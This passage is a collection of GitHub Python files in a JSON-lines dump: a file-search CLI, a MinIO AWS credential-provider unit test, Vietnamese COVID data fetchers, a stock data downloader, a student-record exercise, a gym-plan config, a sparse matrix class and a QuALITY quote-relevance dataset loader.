CamelCase. Instance and module names should be written in lowercase\nw/ underscored between words. \nEvery class should have a dcostring immediately following the class defintion. The docstring description\nshould be about what the class does, and you should follow the same formatting conventions you used for writing docstrings\nin functions. Each module should also have a docstring describing what the classes in a module can be used for. \n'''","repo_name":"CodeSoju/PythonCrashCourse","sub_path":"Chapter9/lottery.py","file_name":"lottery.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30133623080","text":"#!/usr/bin/env python\nfrom os import path\nimport argparse\nfrom src.libs.file_search_util import search_file\nfrom src.libs.os_util import get_visible_files_from_dir, get_recursive_files_from_dir\nfrom src.libs.color_util import ERROR_COLOR, RESET_COLOR\nimport sys\nimport colorama\n\"\"\"Advanced file search program\"\"\"\n'''Options -r recursive'''\n\n\nCURRENT_DIR = path.abspath(path.join(path.dirname(__file__)))\n\n\ndef format_error_string(phrase, file, error) -> str:\n formatted_string = ERROR_COLOR + \"{0}, {1}\".format(phrase, file) + \"\\n\" + str(error) + RESET_COLOR\n return formatted_string\n\n\ndef main():\n parser = argparse.ArgumentParser(description=\"Searches for files in directory for a word or phrase\")\n parser.add_argument(\"phrase\", metavar=\"P\", type=str, help=\"Phrase for searching\")\n parser.add_argument(\"-d\", \"--directory\", metavar=\"D\", type=str, help=\"Directory for the search\", default=\".\")\n parser.add_argument(\"-r\", \"--recursive\", action=\"store_true\", help=\"Declares whether the folders within \"\n \"folders are searched\"\n )\n\n args = parser.parse_args()\n\n colorama.init()\n print(\"Searching with CCSearch.\\n\")\n if args.phrase is not None:\n if args.directory:\n selected_dir = args.directory\n else:\n selected_dir = CURRENT_DIR\n\n if args.recursive:\n file_list = get_recursive_files_from_dir(selected_dir)\n else:\n file_list = get_visible_files_from_dir(CURRENT_DIR)\n\n for file in file_list:\n try:\n sys_out = search_file(file, args.phrase)\n sys.stdout.write(sys_out)\n except UnicodeDecodeError as error:\n print(format_error_string(\"This file is not detectable as a readable file\", file, error))\n except PermissionError as error:\n print(format_error_string(\"This file does not have valid permissions\", file, error))\n\n else:\n print(\"Error, a phrase is required\")\n\n\nmain()\n","repo_name":"ChristopherCampos/ccsearch","sub_path":"src/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":2072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2265249887","text":"# -*- coding: utf-8 -*-\n# MinIO Python Library for Amazon S3 Compatible Cloud Storage, (C)\n# 2020 MinIO, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport os\nfrom unittest import TestCase\n\nfrom minio.credentials.env_aws import EnvAWS\nfrom minio.credentials.credentials import Value\nfrom nose.tools import eq_\n\nclass EnvAWSTest(TestCase):\n\n def test_env_aws_retrieve(self):\n # clear environement\n os.environ.clear()\n # set environment variables\n os.environ[\"AWS_ACCESS_KEY_ID\"] = \"access\"\n os.environ[\"AWS_SECRET_ACCESS_KEY\"] = \"secret\"\n os.environ[\"AWS_SESSION_TOKEN\"] = \"token\"\n # init new env_aws provider\n provider = EnvAWS()\n # assert expired true for newly created provider\n eq_(provider.is_expired(), True)\n # retrieve provider credentials\n creds = provider.retrieve()\n # assert expected data\n expected_creds = Value(\n access_key=\"access\",\n secret_key=\"secret\",\n session_token=\"token\"\n )\n eq_(creds.access_key, expected_creds.access_key)\n eq_(creds.secret_key, expected_creds.secret_key)\n eq_(creds.session_token, expected_creds.session_token)\n # assert expired true for retrieved credentials\n eq_(provider.is_expired(), False)\n\n def test_env_aws_retrieve_no_token(self):\n # clear environement\n os.environ.clear()\n # set environment variables\n os.environ[\"AWS_ACCESS_KEY_ID\"] = \"access\"\n os.environ[\"AWS_SECRET_ACCESS_KEY\"] = \"secret\"\n # Init new env_aws provider\n provider = EnvAWS()\n # assert expired true for newly created provider\n eq_(provider.is_expired(), True)\n # retrieve rpovider credentials\n creds = provider.retrieve()\n # assert expected data\n expected_creds = Value(\n access_key=\"access\",\n secret_key=\"secret\",\n session_token=None\n )\n eq_(creds.access_key, expected_creds.access_key)\n eq_(creds.secret_key, expected_creds.secret_key)\n eq_(creds.session_token, expected_creds.session_token)\n # assert expired true for retrieved credentials\n eq_(provider.is_expired(), False)\n","repo_name":"VariousForks/minio-py","sub_path":"tests/unit/env_aws_provider_test.py","file_name":"env_aws_provider_test.py","file_ext":"py","file_size_in_byte":2747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"1715384293","text":"# dependencies \n# This Python file uses the following encoding: utf-8\nimport numpy as np\nfrom numpy import NaN\nimport pandas as pd\nimport requests\nimport io\nimport json\n\ndef map_world_data():\n \"\"\"\n Get World data\n @Parameter: none\n @return: dff, cases, deaths (dataframe type)\n \"\"\"\n url=\"https://services1.arcgis.com/0MSEUqKaxRlEPj5g/arcgis/rest/services/ncov_cases2_v1/FeatureServer/2/query?where=1%3D1&outFields=Country_Region,Confirmed,Deaths,Mortality_Rate,ISO3&returnGeometry=false&outSR=4326&f=json\"\n rq=requests.get(url).text\n data=json.loads(rq)\n df=pd.json_normalize(data[\"features\"])\n df.rename(columns={'attributes.Country_Region': 'Quốc gia', 'attributes.Confirmed': 'Số ca','attributes.Deaths':'Tử vong','attributes.Mortality_Rate':'Tỉ lệ tử vong','attributes.ISO3':'id'}, inplace=True)\n df.set_index('id', inplace=True, drop=False)\n dff=df.sort_values(by=['Số ca'],ascending=False)\n cases=dff['Số ca'].sum()\n deaths=dff['Tử vong'].sum() \n return dff,cases,deaths\n\ndef map_vn_data():\n \"\"\"\n Get VIETNAM COVID data\n @parameter: none\n @return: dff, nocases, cases, deaths, today, casesToday (dataframe type)\n \"\"\"\n today, total_data_df, today_data_df, overview_7days_df, city_data_df=get_vietnam_covid_data()\n url=\"https://raw.githubusercontent.com/namnguyen215/dataset/main/vn_location.json\"\n rq=requests.get(url).text\n data=json.loads(rq)\n vn_location=pd.json_normalize(data)\n df=city_data_df\n df.loc[df['name']==\"Bà Rịa – Vũng Tàu\",\"name\"]=\"Bà Rịa - Vũng Tàu\"\n dff=pd.merge(df,vn_location)\n nocases=[]\n for x in dff['cases']:\n if(x == 0):\n nocases.append(0)\n else:\n nocases.append(np.log2(x))\n cases=total_data_df.internal['cases']\n deaths=total_data_df.internal['death'] \n casesToday=today_data_df.internal['cases']\n dff.rename(columns={\"name\":\"Tỉnh thành\",\"cases\":\"Số ca\",\"death\":\"Tử vong\",\"casesToday\":\"Số ca hôm nay\"}, inplace=True)\n return dff,nocases,cases,deaths,today,casesToday\n \ndef get_world_covid_data():\n \"\"\"\n Return a dataframe of COVID data of 215 countries\n \"\"\"\n # Source: Our World In Data: \"https://github.com/owid/covid-19-data\"\n data_requests = requests.get(\n 'https://raw.githubusercontent.com/owid/covid-19-data/master/public/data/latest/owid-covid-latest.json')\n\n world_data = dict(data_requests.json())\n df = pd.DataFrame(world_data).T\n df = df[['location', 'continent', 'total_cases', 'total_deaths',\n 'last_updated_date', 'people_vaccinated', 'total_cases_per_million', 'total_deaths_per_million', 'people_vaccinated_per_hundred', 'population', 'people_fully_vaccinated']]\n df.dropna(axis=0, thresh=6, inplace=True)\n return df\n\n\ndef get_vietnam_covid_data():\n \"\"\"\n Return COVID data of VietNam, world:\n (str)today = today's date\\n\n (df)total_data_df: 'death', 'treating', 'cases', 'recovered' (today_data_df.internal['death'])\\n\n (df)today_data_df: 'death', 'treating', 'cases', 'recovered'\\n\n (df)overview_7days_df: 'date', 'death', 'treating', 'cases', 'recovered', 'avgCases7day', 'avgRecovered7day', 'avgDeath7day'\\n\n (df)city_data_df: 'name','death', 'treating', 'cases', 'recovered', 'casesToday'\n \"\"\"\n\n #Source: \"https://covid19.gov.vn/\"\n response = requests.get(\"https://static.pipezero.com/covid/data.json\")\n vietnam_covid_data_dict = response.json()\n\n total_data_df = pd.DataFrame(vietnam_covid_data_dict['total'])\n today_data_df = pd.DataFrame(vietnam_covid_data_dict['today'])\n overview_7days_df = pd.DataFrame(vietnam_covid_data_dict['overview'])\n today = overview_7days_df.iloc[-1]['date']\n city_data_df = pd.DataFrame(vietnam_covid_data_dict['locations'])\n city_data_df = city_data_df[['name', 'cases', 'death', 'casesToday']]\n\n return today, total_data_df, today_data_df, overview_7days_df, city_data_df\n\n\ndef get_hanoi_covid_data():\n \"\"\"\n Return a dataframe COVID data of Hanoi ('locations' - 'positive cases')\n \"\"\"\n lst = []\n page = requests.get(\"https://covidmaps.hanoi.gov.vn/\")\n soup = BeautifulSoup(page.content, \"html.parser\")\n results = soup.find(id=\"list-statistic2\")\n elements = results.find_all(\"div\", class_=\"item-box\")\n for element in elements:\n tmp = {}\n location = element.find(\"div\", class_=\"title-region\")\n numbers = element.find(\"div\", class_=\"val-region\")\n tmp[\"location\"] = location.text.strip()\n tmp[\"positive\"] = int(numbers.text.strip())\n lst.append(tmp)\n df = pd.DataFrame.from_records(lst)\n\n return df\n\n\ndef get_vaccine_data_vietnam_city():\n \"\"\"\n Return a dataframe Vaccine data Vietnam city\n Source: \"https://vnexpress.net/covid-19/vaccine\"\n \"\"\"\n response = requests.get(\n \"https://vnexpress.net/microservice/sheet/type/vaccine_data_vietnam_city\")\n data_text = response.text\n buf = io.StringIO(data_text)\n df = pd.read_csv(buf, delimiter=\",\")\n vietnam_vaccine_city = df[['fK', 'Tổng số dân trên 18 tuổi', 'Số người tiêm liều 1', 'Số người tiêm liều 2 ', 'Tỷ lệ tiêm', 'Tỷ lệ tiêm đủ liều']]\n\n vietnam_vaccine_city['Tỷ lệ tiêm'].replace(\",\", \".\", inplace = True, regex = True)\n vietnam_vaccine_city['Tỷ lệ tiêm'] = pd.to_numeric(vietnam_vaccine_city['Tỷ lệ tiêm'])\n vietnam_vaccine_city['Tỷ lệ tiêm đủ liều'].replace(\",\", \".\", inplace = True, regex = True)\n vietnam_vaccine_city['Tỷ lệ tiêm đủ liều'] = pd.to_numeric(vietnam_vaccine_city['Tỷ lệ tiêm đủ liều'])\n\n vietnam_vaccine_city['Tỷ lệ tiêm 1 mũi'] = vietnam_vaccine_city['Tỷ lệ tiêm'] - vietnam_vaccine_city['Tỷ lệ tiêm đủ liều']\n vietnam_vaccine_city['Tỷ lệ chưa tiêm'] = 100.0 - vietnam_vaccine_city['Tỷ lệ tiêm']\n return vietnam_vaccine_city\n\n\n\n\ndef get_vaccine_data_vietnam():\n \"\"\"\n Return a dataframe Vaccine to Vietnam\n df.loc[df[\"Ngày\"][:] == \"9/10\"]\n \"\"\"\n response = requests.get(\n \"https://vnexpress.net/microservice/sheet/type/vaccine_data_vietnam\")\n data_text = response.text\n buf = io.StringIO(data_text)\n df = pd.read_csv(buf, delimiter=\",\")\n vaccine_data_vietnam = df[['Ngày', 'Tổng số người đã tiêm']]\n vaccine_data_vietnam.dropna(axis=0, thresh=2, inplace=True)\n date = pd.date_range(\"2021-03-07\", periods=len(vaccine_data_vietnam), freq=\"D\")\n vaccine_data_vietnam['Thời gian'] = date\n return vaccine_data_vietnam\n\ndef get_vietnam_covid_19_time_series():\n '''\n Return a dataframe. Confirmed and Deaths of Vietnam from 22/1/2020\n Source: \"https://github.com/CSSEGISandData/COVID-19\"\n '''\n today, total_data_df, today_data_df, overview_7days_df, city_data_df = get_vietnam_covid_data()\n # confirmed \n response = requests.get(\n \"https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_confirmed_global.csv\")\n data_text = response.text\n buf = io.StringIO(data_text)\n df = pd.read_csv(buf, delimiter=\",\")\n time_series_confirmed_vn = df.iloc[275][4:]\n #deaths\n response = requests.get(\n \"https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_deaths_global.csv\")\n data_text = response.text\n buf = io.StringIO(data_text)\n df = pd.read_csv(buf, delimiter=\",\")\n time_series_deaths_vn = df.iloc[275][4:]\n #merge two series\n\n time_series_vn = pd.DataFrame(data=[], index=[])\n date = pd.Series(time_series_confirmed_vn.index, name='Ngày')\n date = pd.to_datetime(date)\n time_series_vn['Ngày'] = date.array\n time_series_vn['Số ca nhiễm'] = time_series_confirmed_vn.array\n time_series_vn['Tử vong'] = time_series_deaths_vn.array\n\n return time_series_vn\n\n","repo_name":"nukima/covid19-dashboard","sub_path":"get_covid_data.py","file_name":"get_covid_data.py","file_ext":"py","file_size_in_byte":8022,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"32774568078","text":"\"\"\"\n\n\"\"\"\nfrom kiteconnect import KiteConnect\nimport pandas as pd\nimport datetime\n\nfrom credentials.kite import access_token, api_key\n\nclass stock:\n def __init__(self, underlying):\n self.underlying = underlying\n self.underlying_ticker = underlying.underlying_ticker\n underlying.stock = self\n\n def get_data(self, start_date, end_date, interval):\n kite = KiteConnect(api_key=api_key)\n kite.set_access_token(access_token)\n\n ticker_name = self.underlying_ticker\n nse_data = pd.DataFrame(kite.instruments('NSE'))\n\n token = nse_data[nse_data.tradingsymbol == ticker_name].instrument_token.values[0]\n kite_data_historical = kite.historical_data(token, start_date,\n end_date,\n interval, continuous=False, oi=False)\n self.data = pd.DataFrame(kite_data_historical)\n","repo_name":"Suprabhash/MultiAssetClassTrading","sub_path":"Base/stock.py","file_name":"stock.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19309722126","text":"import modulo\nimport random\n\ndef menu():\n print('')\n print('1. Carga automatica de alumnos')\n print('2. Mostrar alumnos ordenados por apellido de menor a mayor')\n print('3. Cantidad de alumnos por nivel')\n print('4. Monto total a abonar a un tutor mediante dni')\n print('5. Descuento a alumno de 10% mediante apellido')\n print('')\n return input('Ingrese una opcion: ')\n\ndef cargar_n():\n while True:\n n = int(input('Ingrese la cantidad de alumnos a cargar: '))\n if n > 0:\n return n\n else:\n print('Ingrese un valor positivo')\n\n\ndef cargar_registro_alumnos(n,vec):\n nombres = 'Francisco', 'Martina', 'Ariana'\n apellidos = 'Andrade', 'Espinoza', 'Villalba'\n \n for i in range(n):\n dni = random.randint(10000000, 60000000)\n nombre = random.choice(nombres)\n apellido = random.choice(apellidos)\n dni_tutor = random.randint(10000000, 60000000)\n importe = round(random.uniform(1000, 8000),2)\n nivel_cursado = random.randint(0, 12)\n vec.append(modulo.Alumno(dni, nombre, apellido, dni_tutor, importe, nivel_cursado))\n\ndef ordenar_vector(vec):\n for i in range(len(vec)-1):\n for j in range(i+1, len(vec)):\n if vec[i].apellido > vec[j].apellido:\n vec[i],vec[j] = vec[j], vec[i]\n\ndef mostrar_vector(vec):\n for alumno in vec:\n print(alumno)\n\ndef contar_alumnos_por_nivel(vec):\n vec_cont = 13 * [0]\n for alumno in vec:\n vec_cont[alumno.nivel_cursado] += 1\n return vec_cont\n\ndef mostrar_contador(vec_cont):\n for i in range(len(vec_cont)):\n if vec_cont[i] > 0:\n print('La cantidad de alumnos del nivel', i, 'es', vec_cont[i])\n\ndef importe_acumulado_tutor(dni_tutor, vec):\n importe = 0\n for alumno in vec:\n if alumno.dni_tutor == dni_tutor:\n importe += alumno.importe\n return importe\n\ndef buscar(apellido,vec):\n for alumno in vec:\n if alumno.apellido == apellido:\n alumno.importe = (alumno.importe*10) / 100\n return alumno\n return 'No existe un alumno con ese apellido!'\n\ndef principal():\n \n vec_alumnos = []\n\n while True:\n op = menu()\n\n if op == '0':\n break\n elif op == '1':\n n = cargar_n()\n print(n)\n cargar_registro_alumnos(n,vec_alumnos)\n print('Alumnos cargados!')\n elif op == '2':\n ordenar_vector(vec_alumnos)\n mostrar_vector(vec_alumnos)\n elif op == '3':\n vec_cont = contar_alumnos_por_nivel(vec_alumnos)\n mostrar_contador(vec_cont)\n elif op == '4':\n dni_tutor = int(input('Ingrese el dni del tutor: '))\n total = importe_acumulado_tutor(dni_tutor,vec_alumnos)\n print('El importe acumulado para el tutor con dni', dni_tutor, 'es', total)\n elif op == '5':\n apellido = input('Ingrese el apellido del alumno: ')\n encontrado = buscar(apellido,vec_alumnos)\n print(encontrado)\n else:\n print('Ingrese una opcion valida')\n \n\nif __name__ == '__main__':\n principal()\n","repo_name":"franAndrad/python-src","sub_path":"clases/f21_repasoparcial5/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3168,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"13533194453","text":"from pathlib import Path\n\nimport json\n\nfrom .session_type import SessionType\nfrom .muscle_group import MuscleGroup\n\n\"\"\"This config constant allows to define the number of exercises of a specific muscle group to be associated with a specific gym days\"\"\"\n\n#TODO Create class for config alteration:\n# -Init base config\n# -Change config\n# -Switch between 3 preset configs?\n# - DB config integration?\n\n\n# ---- Chooseable GYM days ----\n# - Allow the user to choose their gym days prior to generation (check box)\n# - From the checked answers we can remove indexes from the possible indexes, or even create new ones?\n\n\"\"\"Below assigns whether the plan will generate a 3 or a 4 day week for gym workouts\"\"\"\nCURRENT_PLAN = 3\n\n\n\"\"\" 3 gym 3 cardio plan \"\"\"\ndef get_gym_config():#3): #type: ignore\n \"\"\"\n Function to return the gym config based on current selection.\n Returns a tuple of (GYM_INDEXES, WEEK_ALLOWANCE, GYM_DAY_CONFIG):\n GYM_INDEXES: a list of weekday index possibilites for the gym days\n WEEK_ALLOWANCE: a dict of SessionTypes: int of days that each session occurs\n GYM_DAY_CONFIG: a dict of the gym SessionTypes and the number of exercises per MuscleGroup\n \"\"\"\n \n # if days:\n # CURRENT_PLAN = days\n\n if CURRENT_PLAN == 3: #type: ignore\n\n # To allow for a day gap between each gym session, below are all possible configurations indexes of the week.\n GYM_INDEXES = [\n [0,2,4],\n [0,2,5],\n [0,2,6],\n [0,3,5],\n [0,3,6],\n [0,4,6],\n [1,3,5],\n [1,3,6],\n [1,4,6],\n [2,4,6]\n ]\n\n # Week consists of: {Type of workout session: number of weekdays}\n WEEK_ALLOWANCES = {\n SessionType.BACK_CORE_ARMS: 1,\n SessionType.CHEST_SHOULDERS: 1,\n SessionType.LEGS: 1,\n SessionType.CARDIO: 3,\n SessionType.REST: 2\n }\n\n GYM_DAY_CONFIG = {\n\n SessionType.BACK_CORE_ARMS: (\n (MuscleGroup.UPPER_BACK, 2),\n (MuscleGroup.LOWER_BACK, 1),\n (MuscleGroup.CORE, 1),\n (MuscleGroup.BICEP, 2),\n (MuscleGroup.TRICEP, 2)\n ),\n\n SessionType.CHEST_SHOULDERS: (\n (MuscleGroup.CHEST_PRESS, 3),\n (MuscleGroup.CHEST_FLY, 2),\n (MuscleGroup.SHOULDER_PRESS, 2),\n (MuscleGroup.SHOULDER_SIDE, 2)\n ),\n \n SessionType.LEGS: (\n (MuscleGroup.WHOLE_LEG, 3),\n (MuscleGroup.QUADS, 1),\n (MuscleGroup.HAMSTRINGS, 1),\n (MuscleGroup.GLUTES, 1)\n ),\n }\n\n PLAN_CONFIG = (GYM_INDEXES, WEEK_ALLOWANCES, GYM_DAY_CONFIG) \n return PLAN_CONFIG\n\n\n \"\"\"4 day gym phase 1\"\"\"\n\n if CURRENT_PLAN == 4: #type: ignore\n\n #4 day indexes: includes one back to back day\n GYM_INDEXES = [\n [0,1,3,5],\n [0,1,3,6],\n [0,1,4,6],\n [0,2,3,5],\n [0,2,3,6],\n [0,2,4,5],\n [0,2,4,6],\n [0,2,5,6],\n [0,3,4,6],\n [0,3,5,6],\n [1,2,4,6],\n [1,3,4,6],\n [1,3,5,6]\n ]\n\n WEEK_ALLOWANCES = {\n SessionType.UPPER: 2,\n SessionType.LOWER: 2,\n SessionType.CARDIO: 1,\n SessionType.REST: 2\n }\n\n GYM_DAY_CONFIG = {\n\n SessionType.UPPER: (\n (MuscleGroup.CHEST_PRESS, 2),\n (MuscleGroup.UPPER_BACK, 1),\n (MuscleGroup.CHEST_FLY, 1),\n (MuscleGroup.CORE, 1),\n (MuscleGroup.BICEP, 2),\n (MuscleGroup.TRICEP, 2)\n ),\n\n SessionType.LOWER: (\n (MuscleGroup.LOWER_BACK, 1),\n (MuscleGroup.WHOLE_LEG, 3),\n (MuscleGroup.SHOULDER_PRESS, 1),\n (MuscleGroup.SHOULDER_SIDE, 1),\n (MuscleGroup.QUADS, 1),\n (MuscleGroup.HAMSTRINGS, 1),\n (MuscleGroup.GLUTES, 1)\n )\n\n }\n\n\n PLAN_CONFIG = (GYM_INDEXES, WEEK_ALLOWANCES, GYM_DAY_CONFIG) \n return PLAN_CONFIG\n\n\n\n\n\n\n\n# CURRENT_CONFIG_FILE = Path(r\"gym_config.json\")\n\n# def config_to_json(config_file):\n\n# with open(CURRENT_CONFIG_FILE, 'w') as f:\n# json.dumps(GYM_DAY_CONFIG)\n\n\n","repo_name":"TWGurnee/HomeAutomation","sub_path":"src/Data/Exercise/gym_day_allowances.py","file_name":"gym_day_allowances.py","file_ext":"py","file_size_in_byte":4374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9705152293","text":"class SparseMatrix:\n def __init__(self, numRows, numCols):\n assert numRows > 0 and numCols > 0, \\\n \"Each dimension of Sparse Matrix must be > 0.\"\n self._numRows = numRows\n self._numCols = numCols\n self._elemList = list()\n\n def numRows(self):\n return self._numRows\n\n def numCols(self):\n return self._numCols\n\n def __getitem__(self, ndxTuple):\n assert len(ndxTuple) == 2, \"Invalid number of matrix subscripts\"\n row = ndxTuple[0]\n col = ndxTuple[1]\n assert row >= 0 and row < self.numRows() and \\\n col >= 0 and col < self.numCols(), \\\n \"Matrix subscript out of range.\"\n ndx = self._findPosition(row, col)\n if ndx is not None:\n return self._elemList[ndx].value\n else:\n return 0.0\n def __setitem__(self, ndxTuple, scalar):\n assert len(ndxTuple) == 2, \"Invalid number of matrix subscripts\"\n row = ndxTuple[0]\n col = ndxTuple[1]\n assert row >= 0 and row < self.numRows() and \\\n col >= 0 and col < self.numCols(), \\\n \"Matrix subscript out of range.\"\n ndx = self._findPosition(row, col)\n if ndx is not None:\n if scalar != 0.0:\n self._elemList[ndx].value = scalar\n else:\n self._elemList.pop(ndx)\n else:\n if scalar != 0.0:\n element = _MatrixElement(row, col, scalar)\n self._elemList.append(element)\n\n def scaleBy(self, scalar):\n for element in self._elemList:\n element.value *= scalar\n\n def __add__(self, rhsMatrix):\n assert rhsMatrix.numRows() == self.numRows() and \\\n rhsMatrix.numCols() == self.numCols(), \\\n \"Matrix sizes not compatible for the add operation.\"\n newMatrix = SparseMatrix( self.numRows(), self.numCols() )\n for element in self._elemList :\n dupElement = _MatrixElement(element.row, element.col, element.value)\n newMatrix._elemList.append( dupElement )\n for element in rhsMatrix._elemList :\n newMatrix[ element.row, element.col ] += element.value\n return newMatrix\n\n def __sub__(self, rhsMatrix):\n assert rhsMatrix.numRows() == self.numRows() and \\\n rhsMatrix.numCols() == self.numCols(), \\\n \"Matrix sizes not compatible for the add operation.\"\n newMatrix = SparseMatrix( self.numRows(), self.numCols() )\n for element in self._elemList :\n dupElement = _MatrixElement(element.row, element.col, element.value)\n newMatrix._elemList.append( dupElement )\n for element in rhsMatrix._elemList :\n newMatrix[ element.row, element.col ] -= element.value\n return newMatrix\n\n def __mul__(self, rhsMatrix):\n assert rhsMatrix.numRows() == self.numCols(), \\\n \"Matrix sizes not compatible for the multiply operation!\"\n numRows = self.numRows()\n numCols = self.numCols()\n newMatrix = SparseMatrix(numRows, numCols)\n for elem in self._elemList:\n for relem in rhsMatrix._elemList:\n if elem.col == relem.row:\n product = elem.value * relem.value\n newMatrix[elem.row, relem.col] += product\n return newMatrix\n\n def _findPosition(self, row, col):\n n = len(self._elemList)\n for i in range(n):\n if row == self._elemList[i].row and \\\n col == self._elemList[i].col:\n return i\n return None\n\n\nclass _MatrixElement:\n def __init__(self, row, col, value):\n self.row = row\n self.col = col\n self.value = value\n","repo_name":"storypku/tlpi","sub_path":"Data.Structures.and.Algorithms.Using.Python/sparse_matrix.py","file_name":"sparse_matrix.py","file_ext":"py","file_size_in_byte":3755,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"37"} +{"seq_id":"9557713389","text":"import random\n\n\nrandom_answer= random.randint(1,9)\n\n\nfor x in range(1,6):\n guessedAnswer= int(input(\"Guess The Number-\"))\n \n if random_answer==guessedAnswer: \n print(\"your guess is absolutely correct\")\n break\n\n elif guessedAnswer>random_answer :\n print(\"Your number is too high\")\n\n else : \n print(\"Your number is too low\")\n\n\n\n","repo_name":"Energizerk-47/Project96","sub_path":"guessingGame.py","file_name":"guessingGame.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"75043425066","text":"from data.dataset import DataRow, DatasetType, RawDataLoader, RawDataset, SpeakerType, SpeechData, SplitType\nfrom data.quality_loader import QualityLoader, QualityDataset\nfrom data.scratchpad_quality_debates_loader import ScratchpadQualityDebatesLoader, ScratchpadQualityDebatesDataset\nimport utils.constants as constants\n\nfrom typing import Any, Optional\n\nfrom pydantic import BaseModel\nimport json\nimport os\nimport pickle\n\n\nclass QuoteRelevanceTopicInfo(BaseModel):\n question: str\n a_position: str\n b_position: str\n\n\nclass QuoteRelevanceProcessedBatchItem(BaseModel):\n a_quote_map: dict[str, int]\n b_quote_map: dict[str, int]\n question_info: QuoteRelevanceTopicInfo\n\n\nclass QuoteRelevanceDataset(QualityDataset):\n FILTER_THRESHOLD = 5\n\n def __init__(\n self,\n train_data: list[dict[str, Any]],\n val_data: list[dict[str, Any]],\n test_data: list[dict[str, Any]],\n quote_label_file_path: str,\n scratchpad_dataset: ScratchpadQualityDebatesDataset,\n ):\n \"\"\"Dataset that builds on top of the quality dataset but there are scratchpads added that contain\n the most relevant quotes from the passage\"\"\"\n super().__init__(\n train_data=train_data,\n val_data=val_data,\n test_data=test_data,\n override_type=DatasetType.QUOTE_RELEVANCE,\n allow_multiple_positions_per_question=True,\n )\n self.__match_processed_quotes_to_stories(\n quote_label_file_path=quote_label_file_path, scratchpad_dataset=scratchpad_dataset\n )\n\n def __match_processed_quotes_to_stories(\n self, quote_label_file_path: str, scratchpad_dataset: ScratchpadQualityDebatesDataset\n ):\n def standardize_string(input_string: str):\n return input_string.strip().lower()\n\n with open(quote_label_file_path, \"rb\") as f:\n quote_labels = pickle.load(f)\n\n pairs = []\n for i, item in enumerate(quote_labels):\n question_info = item.question_info\n for j, row in enumerate(self.data[SplitType.TRAIN]):\n positions = [standardize_string(position) for position in row.positions]\n if (\n standardize_string(row.question) == standardize_string(question_info.question)\n and standardize_string(question_info.a_position) in positions\n and standardize_string(question_info.b_position) in positions\n ):\n pairs.append((item, row))\n break\n\n rows_to_use = []\n for item, row in pairs:\n row.speeches = []\n\n filtered_a_quote_map = {\n quote: score\n for quote, score in filter(lambda x: x[1] > QuoteRelevanceDataset.FILTER_THRESHOLD, item.a_quote_map.items())\n }\n a_scratchpad = \"\\n\\n\".join(\n [\n f\"{(i + 1)}. {constants.QUOTE_TAG}{quote}{constants.UNQUOTE_TAG}\"\n for i, quote in enumerate(filter(lambda x: x, filtered_a_quote_map))\n ]\n ).strip()\n row.speeches.append(SpeechData(text=\"\", position=0, speaker_type=SpeakerType.DEBATER, scratchpad=a_scratchpad))\n\n filtered_b_quote_map = {\n quote: score\n for quote, score in filter(lambda x: x[1] > QuoteRelevanceDataset.FILTER_THRESHOLD, item.b_quote_map.items())\n }\n\n b_scratchpad = \"\\n\\n\".join(\n [\n f\"{(i + 1)}. {constants.QUOTE_TAG}{quote}{constants.UNQUOTE_TAG}\"\n for i, quote in enumerate(filter(lambda x: x, filtered_b_quote_map))\n ]\n ).strip()\n row.speeches.append(SpeechData(text=\"\", position=1, speaker_type=SpeakerType.DEBATER, scratchpad=b_scratchpad))\n\n if a_scratchpad or b_scratchpad:\n rows_to_use.append(row)\n\n rows_to_use.extend(scratchpad_dataset.get_data(split=SplitType.TRAIN))\n\n self.data[SplitType.TRAIN] = rows_to_use\n self.data[SplitType.VAL] = []\n self.data[SplitType.TEST] = []\n\n\nclass QuoteRelevanceLoader(RawDataLoader):\n DEFAULT_QUOTE_LABEL_FILE_PATH = os.environ[\"SRC_ROOT\"] + \"data/datasets/quote-relevance/quote-relevance.p\"\n\n @classmethod\n def load(\n cls,\n train_filepath: Optional[str] = None,\n val_filepath: Optional[str] = None,\n test_filepath: Optional[str] = None,\n supplemental_file_paths: Optional[dict[str, str]] = None,\n **kwargs,\n ) -> QuoteRelevanceDataset:\n \"\"\"Constructs a QuoteRelevanceDataset\"\"\"\n quote_label_file_path = (\n supplemental_file_paths.get(\"quote_label_file_path\", QuoteRelevanceLoader.DEFAULT_QUOTE_LABEL_FILE_PATH)\n if supplemental_file_paths\n else QuoteRelevanceLoader.DEFAULT_QUOTE_LABEL_FILE_PATH\n )\n\n debate_file_path = supplemental_file_paths.get(\"debate_file_path\", None) if supplemental_file_paths else None\n scratchpad_dataset = ScratchpadQualityDebatesLoader.load(full_dataset_filepath=debate_file_path, deduplicate=False)\n\n train, val, test = QualityLoader.get_splits(\n train_filepath=train_filepath, val_filepath=val_filepath, test_filepath=test_filepath\n )\n\n return QuoteRelevanceDataset(\n train_data=train,\n val_data=val,\n test_data=val,\n 